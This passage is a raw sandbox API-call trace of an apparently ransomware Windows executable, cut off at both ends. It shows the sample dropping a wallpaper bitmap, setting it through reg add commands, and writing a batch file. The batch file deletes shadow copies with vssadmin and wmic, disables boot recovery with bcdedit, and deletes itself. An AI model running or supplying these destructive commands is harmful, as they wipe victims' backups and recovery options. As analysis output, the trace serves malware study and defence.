REG_SZ /d \"0\" /f薲￾￿\x19撛皒") returned 228 [0195.899] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f9cf24, csidl=37, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0195.899] FindResourceW (hModule=0x400000, lpName="WALL", lpType=0xa) returned 0x4f54e0 [0195.899] LoadResource (hModule=0x400000, hResInfo=0x4f54e0) returned 0x528dfc [0195.899] SizeofResource (hModule=0x400000, hResInfo=0x4f54e0) returned 0x15fd7 [0195.899] LockResource (hResData=0x528dfc) returned 0x528dfc [0195.912] FreeResource (hResData=0x528dfc) returned 0 [0195.912] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0195.912] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0195.912] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0195.912] LockResource (hResData=0x525e94) returned 0x525e94 [0195.912] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0195.912] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x1fde32c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0195.912] FreeResource (hResData=0x525e94) returned 0 [0195.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0195.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe538c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0195.912] GetCurrentThreadId () returned 0x360 [0195.912] GetCurrentThreadId () returned 0x360 [0195.912] GetCurrentThreadId () returned 0x360 [0195.913] GetTickCount () returned 0x3b68f [0195.913] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb80 | out: lpPerformanceCount=0x19fb80*=24337538196) returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x46\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x37\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x74\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x35\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x48\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x6b\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x30\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb5c, cbMultiByte=1, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="\x44\x67\xfb7c\x19\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x5b\x57\x50\x5d\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x53\x74\x79\x6c\x65\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x20\x26\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x43\x55\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x20\x50\x61\x6e\x65\x6c\x5c\x44\x65\x73\x6b\x74\x6f\x70\x22\x20\x2f\x76\x20\x54\x69\x6c\x65\x57\x61\x6c\x6c\x70\x61\x70\x65\x72\x20\x2f\x74\x20\x52\x45\x47\x5f\x53\x5a\x20\x2f\x64\x20\x22\x30\x22\x20\x2f\x66\x85b2\xf042\xfffe\xffff\xf24c\x19\x649b\x7692") returned 1 [0195.913] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\f7t5hk0d.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0195.914] WriteFile (in: hFile=0x27c, lpBuffer=0x2350010*, nNumberOfBytesToWrite=0x15fd7, lpNumberOfBytesWritten=0x19fb64, lpOverlapped=0x0 | out: lpBuffer=0x2350010*, lpNumberOfBytesWritten=0x19fb64*=0x15fd7, lpOverlapped=0x0) returned 1 [0195.915] CloseHandle (hObject=0x27c) returned 1 [0195.917] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\f7t5hk0d.bmp")) returned 0x20 [0195.917] CharUpperBuffW (in: lpsz="/C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", cchLength=0xe4 | out: lpsz="/C REG ADD \"HKCU\\CONTROL PANEL\\DESKTOP\" /V WALLPAPER /T REG_SZ /D \"[WP]\" /F & REG ADD \"HKCU\\CONTROL PANEL\\DESKTOP\" /V WALLPAPERSTYLE /T REG_SZ /D \"0\" /F & REG ADD \"HKCU\\CONTROL PANEL\\DESKTOP\" /V TILEWALLPAPER /T REG_SZ /D \"0\" /F") returned 0xe4 [0195.917] CharUpperBuffW (in: lpsz="[WP]", cchLength=0x4 | out: lpsz="[WP]") returned 0x4 [0195.917] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fb6c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb5c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", lpProcessInformation=0x19fb5c*(hProcess=0x298, hThread=0x27c, dwProcessId=0xf9c, dwThreadId=0xfa0)) returned 1 [0195.928] CloseHandle (hObject=0x298) returned 1 [0195.928] CloseHandle (hObject=0x27c) returned 1 [0195.928] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0195.928] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fcfa8c, cbMultiByte=31, lpWideCharStr=0x19eb40, cchWideChar=2047 | out: lpWideCharStr="/C wscript //B //Nologo \"[DSP]\"*忐-怠*\x01") returned 31 [0195.928] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f9cf24, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0195.928] GetTickCount () returned 0x3b69f [0195.928] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb70 | out: lpPerformanceCount=0x19fb70*=24339090035) returned 1 [0195.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0195.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0195.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0195.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0195.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0195.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0195.928] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0195.929] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f9cf24, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0195.929] GetTickCount () returned 0x3b69f [0195.929] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb70 | out: lpPerformanceCount=0x19fb70*=24339124700) returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x19fb4c, cbMultiByte=1, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0195.929] FindResourceW (hModule=0x400000, lpName="DS", lpType=0xa) returned 0x4f5420 [0195.929] LoadResource (hModule=0x400000, hResInfo=0x4f5420) returned 0x4f891c [0195.929] SizeofResource (hModule=0x400000, hResInfo=0x4f5420) returned 0xe0 [0195.929] LockResource (hResData=0x4f891c) returned 0x4f891c [0195.929] FreeResource (hResData=0x4f891c) returned 0 [0195.929] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0195.929] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0195.929] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0195.929] LockResource (hResData=0x525e94) returned 0x525e94 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5388, cbMultiByte=38, lpWideCharStr=0x1fde92c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0195.929] FreeResource (hResData=0x525e94) returned 0 [0195.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0195.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe538c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0195.929] GetCurrentThreadId () returned 0x360 [0195.929] GetCurrentThreadId () returned 0x360 [0195.929] GetCurrentThreadId () returned 0x360 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x2433f38, cbMultiByte=224, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 224 [0195.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x2433f38, cbMultiByte=224, lpWideCharStr=0x244169c, cchWideChar=224 | out: lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"[BP]\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0") returned 224 [0195.929] CharUpperBuffW (in: lpsz="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"[BP]\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchLength=0xe2 | out: lpsz="VSSADMIN DELETE SHADOWS /ALL /QUIET\r\nWMIC SHADOWCOPY DELETE\r\nBCDEDIT /SET {DEFAULT} RECOVERYENABLED NO\r\nBCDEDIT /SET {DEFAULT} BOOTSTATUSPOLICY IGNOREALLFAILURES\r\nDEL /F /Q \"[BP]\"\r\nSCHTASKS /DELETE /TN DSHCA /F\r\nDEL /F /Q %0\r\n") returned 0xe2 [0195.929] CharUpperBuffW (in: lpsz="[BP]", cchLength=0x4 | out: lpsz="[BP]") returned 0x4 [0195.930] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ckj5qstc.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0195.931] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q 